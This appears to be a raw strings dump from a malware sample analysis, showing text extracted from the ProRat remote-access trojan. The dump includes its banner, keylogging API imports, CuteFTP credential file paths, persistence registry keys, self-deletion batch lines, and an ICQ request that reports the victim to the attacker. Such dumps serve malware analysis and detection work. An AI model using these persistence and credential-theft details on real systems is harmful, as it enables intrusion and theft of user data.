@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
.rdata
P.idata
@.edata
@.rsrc

services.exe_608:

`.rsrc
Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
TFtpServerX
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbortt
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpCli4
OnProcessHeader
TSyncSmtpCli
smtp
SMTP component not ready
Uhk%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
.htPD
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException0_D
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWord$
220-ICS FTP Server ready
Addressh
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeys42E
AutoHotkeysx2E
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowState44E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
Pplugin4.dat
%s0x%1h
?Key[oku
.rd@a
KERNEL32.DLL
ADVAPI32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
.text
`.rdata
@.data
.rsrc
@.reloc
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
hodll.dll
[Windows title: "%s"]
\ktd32.atm
.HookSec
.reloc
B[* ProRat - Trojan Horse - Coded by PRO Group - Made in Turkey *]
user32.dll
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: http://www.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
www.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
%WinDir%\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
